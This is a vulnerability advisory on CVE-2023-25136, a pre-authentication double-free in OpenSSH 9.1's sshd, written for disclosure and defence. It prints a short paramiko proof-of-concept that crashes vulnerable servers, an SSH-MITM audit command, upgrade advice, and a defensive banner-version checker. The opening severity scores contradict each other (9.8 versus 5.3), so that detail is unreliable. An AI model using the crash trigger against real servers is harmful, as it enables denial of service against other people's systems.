CVSS 9.8 CVE-2023-25136

CVSS 5.3 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

OpenSSH server (sshd) 9.1 introduced a double-free vulnerability during options.kex_algorithms handling. This is fixed in OpenSSH 9.2. The double free can be leveraged, by an unauthenticated remote attacker in the default configuration, to jump to any location in the sshd address space.

One third-party report states “remote code execution is theoretically possible.”

Description

OpenSSH version 9.2p1 was recently released with a fix for a double-free vulnerability. The vulnerability has a severe potential impact on OpenSSH servers and can result in Denial of Service (DoS) or Remote Code Execution (RCE). The JFrog Security Research team investigated the vulnerability and published a blog post with details on the vulnerability, who is affected, and a proof-of-concept to trigger it causing a DoS.

The exploit involves sending a malicious request to an OpenSSH server, triggering a double-free vulnerability in the compat_kex_proposal() function.

JFrog created PoC exploit code, which causes a DoS in the OpenSSH server:

import paramiko

VICTIM_IP = "127.0.0.1"            # address of the sshd instance under test
CLIENT_ID = "PuTTY_Release_0.64"   # client identification string used by the PoC

def main():
    # Open an SSH transport to the server and advertise the chosen client
    # version; the server fails during key exchange, before authentication.
    transport = paramiko.Transport(VICTIM_IP)
    transport.local_version = f"SSH-2.0-{CLIENT_ID}"
    transport.connect(username='', password='')


if __name__ == "__main__":
    main()

SSH-MITM has the PoC integrated as an audit command, which can be used with the following arguments:

$ ssh-mitm audit CVE-2023-25136 --host 192.168.0.1
OK -> server seems vulnerable

Mitigation

It is recommended to upgrade to OpenSSH 9.2.

Release Notes 9.2

fix a pre-authentication double-free memory fault introduced in OpenSSH 9.1. This is not believed to be exploitable, and it occurs in the unprivileged pre-auth process that is subject to chroot(2) and is further sandboxed on most major platforms.
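A defender-side check that follows from the mitigation above: parse a server's SSH identification string (RFC 4253, section 4.2) and flag an advertised OpenSSH 9.1 as affected, 9.2 or later as fixed. This is an added example, not code from the page, JFrog or SSH-MITM; the sample banners are constructed, and the names grab_banner, parse_banner, openssh_version and assess_cve_2023_25136 are chosen here.

```python
import re
import socket

# Constructed sample identification strings (RFC 4253, section 4.2); not captured from real hosts.
SAMPLE_BANNERS = [
    "SSH-2.0-OpenSSH_9.1\r\n",                      # exactly the affected release
    "SSH-2.0-OpenSSH_9.1p1 Debian-2\r\n",           # portable patch level plus vendor comment
    "SSH-2.0-OpenSSH_9.2p1\r\n",                    # release carrying the fix
    "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n",  # predates the bug
    "SSH-2.0-dropbear_2022.83\r\n",                 # not OpenSSH at all
]

# "SSH-protoversion-softwareversion SP comments CR LF"; softwareversion contains no spaces.
_BANNER_RE = re.compile(r"^SSH-(?P<proto>[\d.]+)-(?P<software>\S+)(?: (?P<comments>.*))?$")
_OPENSSH_RE = re.compile(r"^OpenSSH_(?P<major>\d+)\.(?P<minor>\d+)")

def parse_banner(line):
    """Return (protoversion, softwareversion, comments), or None if this is not an SSH banner."""
    m = _BANNER_RE.match(line.rstrip("\r\n"))
    if m is None:
        return None
    return m.group("proto"), m.group("software"), m.group("comments") or ""

def openssh_version(software):
    """Return (major, minor) from an OpenSSH softwareversion such as 'OpenSSH_9.1p1', else None."""
    m = _OPENSSH_RE.match(software)
    return (int(m.group("major")), int(m.group("minor"))) if m else None

def assess_cve_2023_25136(banner):
    """Classify one banner as 'affected' (OpenSSH 9.1), 'fixed' (9.2 or later),
    'not-affected' (older OpenSSH) or 'unknown' (other software or unparseable)."""
    parsed = parse_banner(banner)
    ver = openssh_version(parsed[1]) if parsed else None
    if ver is None:
        return "unknown"
    if ver == (9, 1):
        return "affected"
    return "fixed" if ver >= (9, 2) else "not-affected"

def grab_banner(host, port=22, timeout=5.0):
    """Read the identification string from a live server (network I/O; the samples above run offline)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        f = sock.makefile("rb")
        while True:
            line = f.readline()
            if not line:  # server closed the connection before identifying itself
                return ""
            text = line.decode("utf-8", errors="replace")
            if text.startswith("SSH-"):  # RFC 4253 permits other lines before the banner
                return text
```

Vendors may backport the fix without changing the advertised version, so confirm a banner-based "affected" result against the installed package; the check only reads the banner and never exercises the bug.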

References